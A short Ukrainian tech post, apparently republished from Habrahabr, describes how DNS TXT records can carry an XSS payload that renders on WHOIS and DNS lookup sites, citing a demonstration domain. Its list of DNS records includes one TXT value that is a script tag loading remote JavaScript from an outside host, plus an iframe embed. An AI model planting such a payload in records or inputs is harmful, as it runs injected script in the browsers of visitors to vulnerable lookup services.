Використовуємо DNS не за призначенням

Розумні люди виявили, що через сервери DNS можна передавати на комп'ютери користувачів не зовсім очікуваний ними контент.

Маленька демонстрація цього показана в Whois-запису веб-сервера jamiehankins.co.uk. Наприклад, ось що демонструє людям авторитетний Whois-сервер з посиланням http://who.is/dns/jamiehankins.co.uk.

Вражає, чи не правда?

Ось що можна запроваджувати в Whois-запис веб-сервера:

A 104.28.29.32
A 104.28.28.32
AAAA 2400:cb00:2048:1::681c:1c20
AAAA 2400:cb00:2048:1::681c:1d20
MX alt2.aspmx.l.google.com (20)
MX alt1.aspmx.l.google.com (20)
MX aspmx.l.google.com (10)
MX aspmx3.googlemail.com (30)
MX aspmx2.googlemail.com (30)
TXT "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1Fbdzr8pznltci"
TXT "v=spf1 include:spf.mandrillapp.com ?all"
TXT "<script src='//peniscorp.com/topkek.js'></script>"
TXT "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"

Дивно, що багато хто служби до цих купуються на банальний XSS.

Джерело: Хабрахабр

0 коментарів

Тільки зареєстровані та авторизовані користувачі можуть залишати коментарі.